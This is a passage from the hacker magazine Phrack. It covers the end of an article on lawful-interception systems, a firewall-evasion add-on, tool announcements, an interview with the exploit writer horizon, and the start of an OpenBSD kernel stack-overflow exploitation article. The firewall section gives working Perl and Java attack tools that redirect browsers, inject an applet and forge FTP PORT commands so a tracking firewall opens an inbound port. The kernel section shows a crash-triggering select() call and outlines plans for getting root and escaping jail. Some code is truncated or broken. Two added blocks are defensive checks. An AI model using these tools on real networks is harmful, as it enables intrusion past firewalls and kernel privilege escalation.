Alarm reporting and Error logging 
Automatic software fault recovery 
Automatic or manual disk backup 
SNMP support 
Optional support for X.25 and other collection function interfaces 
ITU standard MML and Java based GUI support 
Support of both circuit-switched and packet-switched networks 
Optional support for other access function interfaces as required for
         CALEA compliance, including: 
 *HLR (Home Location Register) 
 *VMS (Voice Mail System) 
 *SMS (Short Message System) 
 *CDPD wireless data 
 *Authentication Center 
 *Remote access provisioning 

   This concludes the introduction to LAES. This being only an introduction,
I've left out a lot of details like protocol information. However, if you
are interested in learning more about LAES I would suggest reading the TIA
standard J-STD-025A. I hope you learned a little bit more about the
surveillance capabilities of LEAs. If you have any questions feel free to
contact me. Email address: see above.

--[ 5 - Java tears down the Firewall

Recently there has been much hype about various
insecurities in firewalls which support tracking of FTP sessions.
They could be tricked into thinking someone was opening an
FTP session by using a second TCP stack for example. I would
point you to CERT-URL for complete discussion.
There have been other techniques discussed such as embedding
some evil tags in HTML files which make the browser open
connections a firewall could interpret as an FTP session.

Consider the following net:

[ Company ] ---- [ firewall ] --- [ some router ] --- [ WEB ]

Someone from 'Company' is browsing the web and has to
pass his packets across some router that is not under control
by Company but by attacker. Very common scenario no?

A few tools have been compiled to circumvent such setup.
I would even say, as soon as you enable FTP tracking you are lost.
More than one way ends in Rome.

Let me explain the small tools in short.

html-redirect: Attacker installs this on some router and
sets up a redirect rule to port 8888.

class-inject:  Attacker starts this with eftepe.class. html-redirect
will redirect the HTML requests to this mini-httpd. It forces the
browser inside Company, which is shielded by the firewall, to load
the Java applet. This applet simulates an active FTP session to
some router, which is allowed because the security manager sees
some router as the origin of eftepe.class. The firewall will then open
port 7350 inbound so you can connect from some router:20 to Company:7350.

ftpd: Attacker must run this on some router in order to simulate FTP

createclass: script to create the correct Java code which is
using the appropriate IP (of some router) and port (on Company) then

Attacker could also sit on WEB (i.e. :) and embed evil
java applets. So take care because X runs on port 6000. :-)

It is really that simple, and it's not even worth its own article,
that's why you find it here as an add-on.

#!/usr/bin/perl -w

# Puts a classfile into remote browser

use IO::Socket;

sub usage
	print "Usage: $0 <class file>\n\n";

my $classfile = shift || usage();
my $class;
my $classlen = (stat($classfile))[7];
open I, "<$classfile" or die $!;
read I, $class, $classlen;
close I;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8080,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	next unless $conn = $sock->accept();
	if (fork() > 0) {
	my $request = <$conn>;
	if ($request =~ /$classfile/) {
		my $classcontent = "HTTP/1.0 200 OK\r\n".
		 "Server: Apache/1.3.6 (Unix)\r\n".
		 "Content-Length: $classlen\r\n".
		 "Content-Type: application/octet-stream\r\n\r\n".$class;
		print $conn $classcontent;
		print "Injected to ", $conn->peerhost(), "\n";
	} else {
		print $conn "<HTML>".
		            "<APPLET CODE=\"$classfile\" WIDTH=1 HEIGHT=1>".
#!/usr/bin/perl -w

$ENV{"PATH"} = $ENV{"PATH"}."/usr/lib/java/bin";

print "Creating apropriate Java class-file for opeing port > 1023\n";
print "Enter IP to connect to on port 21 (e.g. ''):";
my $ip = <STDIN>; chop($ip);
print "Enter port to open:";
my $port = <STDIN>; chop($port);
my $p1 = int $port/256;
my $p2 = $port%256;

open O, ">" or die $!;
print O<<EOF;

import java.applet.*;
import java.util.*;

public class eftepe extends Applet {

public void init()
	try {
		Socket s = new Socket("$ip", 21);
		OutputStream os = s.getOutputStream();
		BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));
		PrintWriter pw = new PrintWriter(os, true);
		pw.println("USER ftp\\r\\n");
		pw.println("PASS ftp\\r\\n");
		String port = new String("PORT ");
		String me = InetAddress.getLocalHost().getHostAddress();
		port += me.replace('.', ',');
		port += ",$p1,$p2\\r\\n";
	} catch (Exception e) {


print "Compiling into classfile...\n";
print "Done. Results are in eftepe.class\n";


#!/usr/bin/perl -w

use IO::Socket;

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 21,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	$conn = $sock->accept();
	if (fork() > 0) {
	print $conn "220 ready\r\n";
	<$conn>;  # user
	print $conn "331 Password please\r\n";
	<$conn>;  # pass
	print $conn "230 Login successful\r\n";
	<$conn>;  #port
	print $conn "200 PORT command successful.\r\n";
	exit 0;

#!/usr/bin/perl -w

# Simple HTTP Redirector

# iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888

use IO::Socket;

sub usage
	print "Usage: $0 <IP|Host>\n".
	      "\t\tIP|Host -- IP or Host to redirect HTML reuests to\n\n";

my $r = shift || usage();
my $redir = "HTTP/1.0 301 Moved Permanently\r\n".
            "Location: http://$r:8080\r\n\r\n";

my $sock = new IO::Socket::INET->new(Listen => 10,
                                     LocalPort => 8888,
                                     Reuse => 1) or die $!;
my $conn;

for (;;) {
	next unless $conn = $sock->accept();
	if (fork() > 0) {
	my $request = <$conn>;
	print $conn "$redir";

#!/usr/bin/perl -w

use IO::Socket;

sub usage
	print "Usage: $0 <Host> <Port>\r\n";
	exit 0;

my $a = shift || usage();
my $b = shift || usage();

my $conn = IO::Socket::INET->new(PeerAddr => $a,
                                 PeerPort => $b,
                                 LocalPort => 20,
                                 Type => SOCK_STREAM,
                                 Proto => 'tcp') or die $!;

print $conn "GOTCHA\r\n";


# sample FTP session tracked firewall for 2.4 linux kernels
# modprobe ip_conntrack_ftp

iptables -F

iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT

iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLISHED -j ACCEPT

#iptables -A INPUT -p tcp --syn -j LOG
iptables -A INPUT -p tcp --syn -j DROP
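
A defender's view of the PORT tracking described above, as an added example
that is not part of the original article: a policy check of the kind an
FTP-aware filter or proxy could apply before opening an inbound data port.
The function names, the allow-list policy and all addresses are assumptions
made for illustration; the sample control-channel lines are constructed.

```python
import ipaddress
import re

# "PORT h1,h2,h3,h4,p1,p2" as sent on the FTP control channel (RFC 959).
PORT_RE = re.compile(
    r"^PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$",
    re.IGNORECASE,
)


def parse_port(line):
    """Return (address, port) from a PORT command, or None if malformed."""
    m = PORT_RE.match(line)
    if m is None:
        return None
    nums = [int(g) for g in m.groups()]
    if any(n > 255 for n in nums):
        return None
    addr = ipaddress.ip_address(".".join(str(n) for n in nums[:4]))
    # Same split as $p1/$p2 in createclass: port = p1 * 256 + p2.
    return addr, nums[4] * 256 + nums[5]


def decide(line, client_ip, server_ip, trusted_servers, protected_ports):
    """Decide whether a tracked PORT command may open an inbound data port.

    Assumed policy (hypothetical, not taken from any real firewall):
      1. FTP tracking applies only to allow-listed servers.
      2. The address in PORT must be the client's own address.
      3. The port must be unprivileged and not a protected local service.
    """
    parsed = parse_port(line)
    if parsed is None:
        return ("deny", "malformed PORT")
    addr, port = parsed
    if ipaddress.ip_address(server_ip) not in trusted_servers:
        return ("deny", "server not on FTP allow-list")
    if addr != ipaddress.ip_address(client_ip):
        return ("deny", "PORT address differs from client")
    if port < 1024:
        return ("deny", "privileged port")
    if port in protected_ports:
        return ("deny", "protected service port")
    return ("allow", "expect %s:20 -> %s:%d" % (server_ip, addr, port))


# Constructed sample data (documentation address ranges, not real hosts).
CLIENT = "10.0.0.5"
TRUSTED = {ipaddress.ip_address("192.0.2.10")}
PROTECTED = {6000}  # X11, the service the article warns about
SAMPLES = [
    ("203.0.113.7", "PORT 10,0,0,5,28,182\r\n"),  # unknown server, port 7350
    ("192.0.2.10", "PORT 10,0,0,5,23,112\r\n"),   # trusted server, port 6000
    ("192.0.2.10", "PORT 10,0,0,9,195,80\r\n"),   # address of another host
    ("192.0.2.10", "PORT 10,0,0,5,195,80\r\n"),   # well-formed, port 50000
]


def run_samples():
    """Apply the policy to every constructed sample line."""
    return [decide(line, CLIENT, srv, TRUSTED, PROTECTED) for srv, line in SAMPLES]


if __name__ == "__main__":
    for (srv, line), verdict in zip(SAMPLES, run_samples()):
        print(srv, line.strip(), "->", verdict)
```

With this policy the session from the scenario is refused at the first rule,
because the server end of the control connection is not a known FTP server.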

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x04 of 0x10

|=--------------------=[ T O O L Z   A R M O R Y ]=----------------------=|
|=---------=[ packetstorm <>  ]=-------=|

This new section, Phrack Toolz Armory, is dedicated to tool announcements.
We will showcase selected tools of relevance to the computer underground
which have been released recently. The tools for #60 have been selected
in teamwork by the Packet Storm staff and Phrack staff.

Drop us a mail if you develop something that you think is worthy of being
mentioned here.

   1 - nmap 3.1 Statistics Patch
   2 - thc-rut
   3 - Openwall GNU/*/Linux (Owl) 1.0
   4 - Stealth Kernel Patch
   5 - Memfetch
   6 - Lcrzoex

----[ 1 - NMAP 3.1 Statistics Patch

URL     :
Author  : vitek[at] 
Comment : The Nmap 3.10ALFA Statistics Patch adds the -c switch which
          guesses how much longer the scan will take, shows how many ports
          have been tested, resent, and the ports per second rate.  Useful
          for scanning firewalled hosts.

----[ 2 - thc-rut

URL     :
Author  : anonymous[at]
Comment : RUT (aRe yoU There, pronounced as 'root') is your first knife on
          foreign network. It gathers information from local and remote
          It offers a wide range of network discovery utilities
          like arp lookup on an IP range, spoofed DHCP request, RARP,
          BOOTP, ICMP-ping, ICMP address mask request, OS fingerprinting,
          high-speed host discovery, ...

          THC-RUT comes with an OS host fingerprinter which determines the
          remote OS by open/closed port characteristics, banner matching
          and nmap fingerprinting techniques (T1, tcpoptions).

          The fingerprinter has been developed to quickly (10mins)
          categorize hosts on a Class B network. Information sources are
          (among others) SNMP replies, telnetd (NVT) negotiation options,
          generic Banner Matching, HTTP-Server version, DCE request and
          tcp options. It is compatible with the nmap-os-fingerprints
          database and comes in addition to this with its own perl regex
          capable fingerprinting database (thcrut-os-fingerprints).

----[ 3 - Openwall GNU/*/Linux (Owl) 1.0 (Released 2002-10-13)

URL     :
Author  : Solar Designer and other hackers.
Comment : Openwall Linux is the Hacker's choice platform. The security
          has been defined by people who know what they are doing. Owl
          comes without any useless services running by default, no RPM
          dependencies headache, full featured environment for
          developers, a large number of useful tools and a BSD-port-like
          update mechanism. It's for people who prefer vi over
          click/drag-and-drop sickness to configure the system.

          Openwall GNU/*/Linux (Owl) includes a pre-built copy of John
          the Ripper password cracker ready for use without requiring
          another OS (live system!) and without having to install on a
          hard disk (although that is supported). The CD-booted system
          is fully functional, you may even let it go multi-user with
          virtual consoles and remote shell access.

          John the Ripper is a fast password cracker, currently
          available for many flavors of Unix (11 are officially
          supported, not counting different architectures), DOS, Win32,
          and BeOS. Its primary purpose is to detect weak Unix
          passwords, but a number of other hash types are supported

          This is probably the most secure linux distribution out there.

----[ 4 - Stealth Kernel Patch

URL     :
Author  : Sean Trifero <sean[at]>
Comment : The Stealth Kernel Patch for Linux v2.2.22 makes the linux kernel
          discard the packets that many OS detection tools use to query the
          TCP/IP stack. Includes logging of the dropped query packets and
          packets with bogus flags. Does a very good job of confusing nmap
          and queso.

----[ 5 - Memfetch

URL     :
Author  : Michal Zalewski <lcamtuf[at]>
Comment : Memfetch dumps the memory of a program without disrupting its
          operation, either immediately or on the nearest fault condition
          (such as SIGSEGV). It can be used to examine suspicious or
          misbehaving processes on your system, verify that processes are
          what they claim to be, and examine faulty applications using your
          favorite data viewer so that you are not tied to the inferior
          data inspection capabilities in your debugger.

----[ 6 - Lcrzoex

URL     :
 (front end)
Author  : Laurent Constantin <[email protected]>
Comment : Lcrzoex contains over 400 tools to test an Ethernet/IP
          network. It runs under Linux, Windows, FreeBSD, OpenBSD and
          Solaris. Features:

		  - sniff/spoof/replay
		  - syslog/ftp/dns/http/telnet clients
		  - ping/traceroute
		  - web spider
		  - tcp/web backdoor
		  - data conversion

|=[ EOF ]=---------------------------------------------------------------=|


                            ==Phrack Inc.==

              Volume 0x0b, Issue 0x3c, Phile #0x05 of 0x10

|=--------------=[ P R O P H I L E   O N   H O R I Z O N ]=--------------=|
|=------------------------=[ Phrack Staff ]=-----------------------------=|

|=---=[ Specification

                  Handle: horizon
                     AKA: humble, john
           Handle origin: It sounded neat.
               catch him: I'm very easy to find.
        Age of your body: mid 20s
             Produced in: USA
         Height & Weight: 5'11" ~165 lbs.
                    Urlz: Nope
               Computers: A couple of decent x86 boxes and a lot of
                          older stuff..
               Member of: CostCo
                Projects: Currently, stuff for work, and a few personal
                          things that really aren't that interesting.

|=---=[ Favorite things

          Women: Creativity, intelligence, a sense of style.
           Cars: German
          Foods: Indian, Thai, Korean, Greek, Japanese, Lean Pockets
        Alcohol: Helles, Redbull & Vodka
          Music: Screeching Weasel, Fugazi, Stretch Armstrong,
                 Bad Religion, some electronic
         Movies: Big Lebowski, Office Space, Austin Powers, Memento, Pi
Books & Authors: Sigh.. I wish I read more these days.
           Urls: Can't think of any...
         I like: Engaging conversation. Sincerity and conviction.
                 Solving difficult problems. Mr. Show. Gummi Bears.
      I dislike: Unwarranted arrogance. Unwarranted Gummi Bears.

|=---=[ Life in 3 sentences

I've never been normal. I've always felt a sense of purpose. I've tried
to be generous.

|=---=[ Hacker Life

PHRACKSTAFF: You have found quite a lot of bugs in the past and developed
             exploit code for them. Some vulnerabilities required new
             creative exploitation concepts which were not known at that
             time. What drives you into challenging the exploitation of
             complicated bugs and what methods do you use?

Well, my motivations have definitely changed over time. I can come
up with several ancillary reasons that have driven me at different times
during my life, and they include both the selfish and the altruistic. But,
I think it really comes down to a compulsion to figure all this stuff

As far as methods, I try to be somewhat systematic in my approach. I
budget a good portion of time for just reading through the program,
trying to get a feel for its architecture and the mindset and techniques
of its authors. This also seems to help prime my subconscious.

I like to start at the lower layers of a program or system and look for
any kind of potential unexpected behavior that could percolate upwards. I
will document each function and brainstorm any potential problems I see
with it. I will occasionally take a break from documentation, and do the
considerably more fun work of tracing back some of my theories to see if
they pan out.

As far as writing exploits, I generally just try to reduce or eliminate
the number of things that need to be guessed.

|=---=[ Passions | What makes you tick

I'm definitely obsessed with computers. One of my original goals in
learning to program as a kid was to develop games, so I've always been
kind of passively interested in that. I'm also interested in artificial

I've been doing Wing Chun kung fu for about two years now, and I find
that to be really rewarding.

I spend a decent bit of my time thinking. I like to read lay-person
oriented overviews of various academic disciplines. I'd really like to
learn more about biology and neuroscience.

|=---=[ Which research have you done or which one gave you the most fun?

I think I've had the most fun when collaborating with others.

|=---=[ Memorable Experiences

Hanging out with sygma, saad, wordsmith, shegget, and all my old irc
friends. Getting into trouble with colonwq. Long, not entirely coherent,
chats with rc.local. :>

The weekend drinking/hacking/coding sessions at neon's place.
boilermakers. Romania. Coding with xaphan. Almost getting fired from my
university job for hacking Microsoft, and then getting let off the hook
when one of their security officers called my boss. Helping joey__ write
his first exploit, and then not understanding how it worked when he had
finished. Working on various stuff with JoC, cham, module, so1o, zorkeres,
binf, and the rest of the r9 guys.

Hanging out with Vacuum and RFP before leaving the US.

The time I spent living in Germany. Working with plaguez and Thomas, two
absurdly brilliant guys. Living with Howard and Sondee.. eating at the
Citta. CCC Camp - Meeting TESO, THC, and many others. linux deathmatch.

Watching people like duke and scut (and many others) get really good, and
hoping that I somehow helped.

Accidentally crashing gatekeeper.

Hanging out in the adm channel. The always interesting discussions with
str and anti. Racing with K2 to write exploits as Sun advisories came

The Firewall-1 speech with Dug and Thomas.

Finally getting my degree.

My european tour with dice. HAL. Meeting silvio. Getting smashed in the
basement of a bar in Poland with the LSD guys. Chilling with Scrippie and
Dvorvak and the members of a Dutch death metal band.

Going to a rave in Miami with JJ and ending up in the keys the day before
a hurricane.

Watching my little brothers grow up.

Tag team coding/auditing with dice.

Working for cool people - Mike, Jim, Pat.

German/reversing lessons from Halvar.

sms's from srpnsrt.

Defcon - meeting digit, cheez, charise, zip, gobbles, i1l, cain, arakis,
caddis, ryan, riley, and so many others.

The fun times I've had in Chicago. Greg's couch. OFP with Paul and
Sergey. The bachelor party with monti and MJ. Meeting the esteemed Sarlo.

|=---=[ What's your architecture of choice? OS of choice?

I tend to use what I'm comfortable with or whatever seems appropriate at
the moment. The three machines that I use most of the time are currently
running XP, Linux, and OpenBSD.

|=---=[ Quotes

"Jesus Christ John McDonald!"


"So, basically, what you are saying is that we should try to find the

"Hey, I just work here..."

|=---=[ Open Interview

Q: When did you start playing with computers?

I got a c64 when I was 6.

Q: When did you have your first contact with the 'scene'?

1997 or so.

Q: When did you first connect to the Internet?

1993. I had a part time job in high school programming for a satellite
research center that had Internet access. From what I recall, I mainly
played around on usenet and ftp sites.

Q: Let's talk a little bit about free research and Copyright. What's your
   opinion about "Copyright on exploits"?

Well, I'm not a lawyer, and I haven't really looked into it. I think that
people should be entitled to do what they want with their work, and that
legal protections are there for a reason. However, I've got no idea what
copyrighting an exploit will actually afford you legally.

Q: If you could turn the clock backward, what would you do differently
   in your young life?

That's a tough one. The Internet has suffered a fair bit for the sake of
my ego. I think I would have handled certain things with more discretion
if I'd had a little more perspective.

|=---=[ One word comments

Give a one word comment to the following topics:

Digital Millennium Copyright Act (DMCA): oceanliner
KIMBLE (the wannabe-hacker)            : hoogedlyboogedly
ADM                                    : fun
NAI                                    : work
THE SCENE                              : which?
Companies buying exploits from hackers : dunno
IRC                                    : idle
CERT                                   : maligned
Full Disclosure Policy                 : careful

|=---=[ Would you work for the government/military? Why or why not?

As much as it surprises me to say it, I don't really have an ideological
opposition to working for my government. I think the combination of
getting a little bit older, spending some time living abroad, and the
recent events in my country has made me more appreciative of certain
things. I think it is safe to say I would do it if I believed I was doing
something positive and I thought it was necessary. Otherwise, I'd avoid
it because it would just make life more complicated.

|=---=[ Please tell our audience a worst case scenario into what the scene
        might turn into.

I guess I could prognosticate about it becoming factionalized, petty,
cruel, insecure, and paranoid, but who would I be kidding?

|=---=[ And if everything works out fine? What's the best case scenario
        you can imagine?

As long as there is a place for new people who show promise, I think things
will be cool.

|=---=[ Any suggestions/comments/flames to the scene and/or specific people?

Think for yourself.

|=---=[ Shoutouts & Greetings

Hi everyone :>

|=[ EOF ]=---------------------------------------------------------------=|


                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x06 of 0x10

|=----------=[ Smashing The Kernel Stack For Fun And Profit ]=----------=|
|=--------------=[ Sinan "noir" Eren <[email protected]> ]=--------------=|

The article presented here is bound to no organization or company.  It is
the author's contribution to the hacker community at large.  The research
and development in this article is done by the author with NO SUPPORT from
a commercial organization or company. No organization or company should be
held responsible or credited for this article other than the author

--[ Contents

	1 - Introduction

	2 - The vulnerability: OpenBSD select() syscall overflow

	3 - Obstacles encountered in exploitation
	  3.1 - Overcoming the large copyin() problem
	    3.1.1 - mprotect() 4 life!
	  3.2 - Payload storage problem
	  3.3 - Return to user land problem

	4 - Crafting the exploit
	  4.1 - Breakpoints & distance Calculation
	  4.2 - Return address overwrite & execution redirection

	5 - How to gather offsets & symbol addresses
	  5.1 - sysctl() syscall
	  5.2 - sidt technique & _kernel_text search
	  5.3 - _db_lookup() technique	    
	  5.4 - /usr/bin/nm, kvm_open(), nlist()
	  5.5 - %ebp fixup	

	6 - Payload/shellcode creation
	  6.1 - What to achieve
	  6.2 - The payload
	    6.2.1 - p_cred & u_cred
	    6.2.2 - chroot breaking
	    6.2.3 - securelevel
	  6.3 - Get root & escape jail

	7 - Conclusions

	8 - Greetings

	9 - References

	10 - Code

--[ 1 - Introduction

This article is about recent exposures of many kernel level vulnerabilities
and advances in their exploitation which lead to trusted (oops safe) and
robust exploits.

We will focus on 2 recent vulnerabilities in the OpenBSD kernel as our case
studies. Out of these we will mainly concentrate on exploitation of the
select() system call buffer overflow. The setitimer() arbitrary memory
overwrite vulnerability will be explained in the code section of this
article (as inline comments, so as not to repeat what we have already
covered whilst exploring the select() buffer overflow).

This paper should not be viewed as an exploit construction tutorial, my
goal is, rather, to explore and demonstrate generic ways to exploit stack
overflows and signed/unsigned vulnerabilities in kernel space.

Case studies will be used to demonstrate these techniques, and reusable
*BSD "kernel level shellcodes" -- with many cool features! -- will be

There has been related work done by [ESA] and [LSD-PL], which may
complement this article.

--[ 2 - The Vulnerability: OpenBSD select() syscall overflow

sys_select(p, v, retval)
        register struct proc *p;
        void *v;
        register_t *retval;
{
        register struct sys_select_args /* {
                syscallarg(int) nd;
                syscallarg(fd_set *) in;
                syscallarg(fd_set *) ou;
                syscallarg(fd_set *) ex;
                syscallarg(struct timeval *) tv;
        } */ *uap = v;
        fd_set bits[6], *pibits[3], *pobits[3];
        struct timeval atv;
        int s, ncoll, error = 0, timo;
        u_int ni;

[1]     if (SCARG(uap, nd) > p->p_fd->fd_nfiles) {
                /* forgiving; slightly wrong */
                SCARG(uap, nd) = p->p_fd->fd_nfiles;
        }
[2]     ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask);
[3]     if (SCARG(uap, nd) > FD_SETSIZE) {


#define getbits(name, x) \
[4]   if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), \
            (caddr_t)pibits[x], ni))) \
                goto done;
[5]     getbits(in, 0);
        getbits(ou, 1);
        getbits(ex, 2);
#undef  getbits


To make some sense out of the code above we need to decipher the SCARG
macro, which is extensively used in the OpenBSD kernel syscall handling

Basically, SCARG() is a macro that retrieves the members of the 'struct
sys_XXX_args' structures.

#if BYTE_ORDER == BIG_ENDIAN
#define SCARG(p, k)     ((p)->k.be.datum)       /* get arg from args pointer */
#else
#define SCARG(p, k)     ((p)->k.le.datum)       /* get arg from args pointer */
#endif

#define syscallarg(x)                                                   \
        union {                                                         \
                register_t pad;                                         \
                struct { x datum; } le;                                 \
                struct {                                                \
                        int8_t pad[ (sizeof (register_t) < sizeof (x))  \
                                ? 0                                     \
                                : sizeof (register_t) - sizeof (x)];    \
                        x datum;                                        \
                } be;                                                   \
        }

Access to structure members is performed via SCARG() in order to preserve
alignment along CPU register size boundaries, so that memory accesses will
be faster and more efficient.

In order to make use of the SCARG() macro, the declarations need to be done
as follows (example for select() syscall arguments):

struct sys_select_args {
[6]     syscallarg(int) nd;
        syscallarg(fd_set *) in;
        syscallarg(fd_set *) ou;
        syscallarg(fd_set *) ex;
        syscallarg(struct timeval *) tv;

The vulnerability can be described as an insufficient check on the 'nd'
argument [6], which is used as the length parameter for userland to kernel
land copy operations.

Whilst there is a check [1] on the 'nd' argument (nd represents the highest
numbered descriptor plus one, in any of the fd_sets), which is checked
against the p->p_fd->fd_nfiles (the number of open descriptors that the
process is holding), this check is inadequate -- 'nd' is declared as signed
[6], so it can be negative, and therefore will pass the greater-than check

Then 'nd' is put through a macro [2], in order to calculate an unsigned
integer, 'ni', which will eventually be used as the length argument for
the copyin operation.

howmany() [2] is defined as follows (sys/param.h line 175):

#define howmany(x, y)   (((x)+((y)-1))/(y))

Expansion of line [2] will look as follows:

sys/types.h:157, 169
#define NBBY    8               /* number of bits in a byte */

typedef int32_t fd_mask;
#define NFDBITS (sizeof(fd_mask) * NBBY)        /* bits per mask */
ni = ((nd + (NFDBITS-1)) / NFDBITS)  * sizeof(fd_mask);
ni = ((nd + (32 - 1)) / 32) * 4

Calculation of 'ni' is followed by another check on the 'nd' argument [3].
This check is also passed, since OpenBSD developers consistently forget
about the signedness checks on the 'nd' argument. Check [3] was done to see
if the space allocated on the stack is sufficient for the following copyin
operations, and, if not, then sufficient heap space will be allocated.

Given the inadequacy of the signed check, we'll pass check [3] (>
FD_SETSIZE), and will continue using stack space. This will make our life
much easier, given that stack overflows are much more trivially exploited
than heap overflows. (Hopefully, I'll write a follow-up paper that will
demonstrate kernel-land heap overflows in the future).

Finally, the getbits() [4,5] macro is defined and called in order to
retrieve user supplied fd_sets (readfds, writefds, exceptfds -- these
arrays contain the descriptors to be tested for 'ready for reading', 'ready
for writing' or 'have an exceptional condition pending').

For exploitation purposes we don't really care about the layout of the
fd_sets -- they can be treated as any simple char buffer aiming to overflow
its boundaries and overwrite the saved ebp and saved eip.

With this simple test code, we can reproduce the overflow:

#include <stdio.h>
#include <sys/types.h>

	char *buf;
	buf = (char *) malloc(1024);
	memset(buf, 0x41, 1024);
	select(0x80000000, (fd_set *) buf, NULL, NULL, NULL);
What happens is: system call number 93 (SYS_select) is dispatched to the
handler sys_select() by the syscall() function, with all user land supplied
arguments bundled into a sys_select_args structure.

'nd', being 0x80000000 (the smallest negative number for signed 32bit) has
gone through the size check [1] and, later, the howmany() macro [2]
calculates unsigned integer 'ni' as 0x10000000. The getbits() macro [5] is
then called with the address of buf (user land, heap) which expands to the
copyin(buf, kernel_stack, 0x10000000) operation.

copyin() starts to copy the userland buffer to the kernel stack, a long at
a time (0x10000000/4 times). However, this copy operation won't ever fully
succeed, as the kernel will run out of per-process stack trying to copy
such a huge buffer from userland -- and will crash on an out of bounds
write operation.
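The arithmetic above can be checked in user space. The following is an added example, not code from the original article or from OpenBSD: it models checks [1]-[3] with 32-bit unsigned arithmetic (as on i386) next to one possible hardened form. The FD_SETSIZE value of 256, the helper names and the hardened checks are assumptions made for the model.

```c
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

#define NBBY_M 8                            /* bits per byte */
typedef int32_t fd_mask_m;                  /* stands in for fd_mask */
/* i386 model: sizeof() yields a 32-bit unsigned value there, so the mixed
 * signed/unsigned expression in howmany() wraps modulo 2^32. Forcing
 * uint32_t reproduces that on a 64-bit build host. */
#define NFDBITS_M       ((uint32_t)(sizeof(fd_mask_m) * NBBY_M))
#define HOWMANY_M(x, y) (((x) + ((y) - 1)) / (y))
#define FD_SETSIZE_M    256                 /* assumed value for this model */
#define STACK_SET_BYTES (FD_SETSIZE_M / NBBY_M) /* one on-stack fd_set */

struct len_result {
    int      error;     /* 0 or an errno-style code */
    uint32_t ni;        /* byte count that would be handed to copyin() */
    int      on_stack;  /* 1: fixed stack fd_sets, 0: heap path */
};

/* Checks [1]-[3] as quoted above: every comparison on 'nd' is signed. */
static struct len_result select_len_original(int nd, int fd_nfiles)
{
    struct len_result r = { 0, 0, 1 };

    if (nd > fd_nfiles)                     /* [1] negative nd passes */
        nd = fd_nfiles;
    r.ni = HOWMANY_M((uint32_t)nd, NFDBITS_M)
        * (uint32_t)sizeof(fd_mask_m);      /* [2] nd becomes unsigned */
    if (nd > FD_SETSIZE_M)                  /* [3] negative nd passes */
        r.on_stack = 0;
    return r;
}

/* Hardened form (assumption, not the project's actual patch): reject a
 * negative count first, then enforce the length/buffer invariant. */
static struct len_result select_len_hardened(int nd, int fd_nfiles)
{
    struct len_result r = { 0, 0, 1 };

    if (nd < 0) {
        r.error = EINVAL;
        return r;
    }
    if (nd > fd_nfiles)
        nd = fd_nfiles;
    r.ni = HOWMANY_M((uint32_t)nd, NFDBITS_M) * (uint32_t)sizeof(fd_mask_m);
    if (nd > FD_SETSIZE_M)
        r.on_stack = 0;
    if (r.on_stack && r.ni > STACK_SET_BYTES) {  /* defence in depth */
        r.error = EINVAL;
        r.ni = 0;
    }
    return r;
}

/* How far a copy of r.ni bytes would run past one on-stack fd_set. */
static uint32_t bytes_past_stack_set(struct len_result r)
{
    if (r.error || !r.on_stack || r.ni <= STACK_SET_BYTES)
        return 0;
    return r.ni - STACK_SET_BYTES;
}

int main(void)
{
    /* Constructed inputs: nd values and a process with 20 open files. */
    int samples[] = { 5, 256, -1, INT_MIN };
    size_t i;

    for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        struct len_result o = select_len_original(samples[i], 20);
        struct len_result h = select_len_hardened(samples[i], 20);
        printf("nd=%11d original: ni=0x%08x stack=%d past=0x%08x | "
               "hardened: err=%d ni=0x%08x\n", samples[i],
               (unsigned)o.ni, o.on_stack,
               (unsigned)bytes_past_stack_set(o), h.error, (unsigned)h.ni);
    }
    return 0;
}
```

A negative 'nd' in the range -31..-1 wraps to a length of zero in this model, which is why 0x10000000 is the smallest non-zero length a negative 'nd' can produce.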

--[ 3 - Obstacles encountered in exploitation

     - copyin(uaddr, kaddr, big_number) problem

The first and most obvious problem is taking control of the size argument
'ni' passed to the copyin operation. Since this number is derived from the
user supplied 'nd' argument, which must be negative, we'll never be able to
construct a reasonably "big" number. Actually the "smallest" positive
number we can construct is 0x10000000. As we have already found out, this
number will cause us to hit the end of the kernel stack and the kernel will
panic. This is our first obstacle and we'll overcome it by exploring how
copyin() works in the following section.

      - payload storage problem

This is a typical problem for every type of exploit (user or kernel land):
determining the most appropriate place to store the payload/shellcode.
This problem is rather simple to overcome in kernel land exploits and we'll
talk about the proper solution.

      - clean return to user land problem

Another problem arises after we overwrite the saved return address and gain
control. At that point we can be real imaginative with the payload, but
we'll run into the trouble of how to return back to user land and be able
to enjoy our newly altered kernel space!

--[ 3.1 - Overcoming The Large copyin() Problem

To be able to solve this problem, we need to read through the copyin() and
trap() functions and understand their internals.

We shall start by understanding copyin() user to kernel copy primitive, my
comments will be inlined:


        pushl   %esi
        pushl   %edi

Save %esi, %edi .

        movl    _C_LABEL(curpcb),%eax

Move the current process control block address (_curpcb) into %eax .
_C_LABEL() is a simple macro that will add an underscore sign to the
beginning of the symbol name. See sys/arch/i386/include/asm.h:66

The process control block is a per-process kernel structure that holds the
current execution state of a process and differs based on machine
architecture. It consists of: stack pointer, program counter,
general-purpose registers, memory management registers and some other
architecture dependent members such as per process LDT's (i386) and so on.
The *BSD kernel extends the PCB with software related entries, such as the
"copyin/out fault recovery" handler (pcb_onfault). Each process control
block is stored and referenced through the user structure. See
sys/user.h:61 and [4.4 BSD].

[1]    pushl   $0

Push a ZERO on the stack; this will make sense at the epilog or the
_copy_fault function, which has the matching 'popl' instruction.

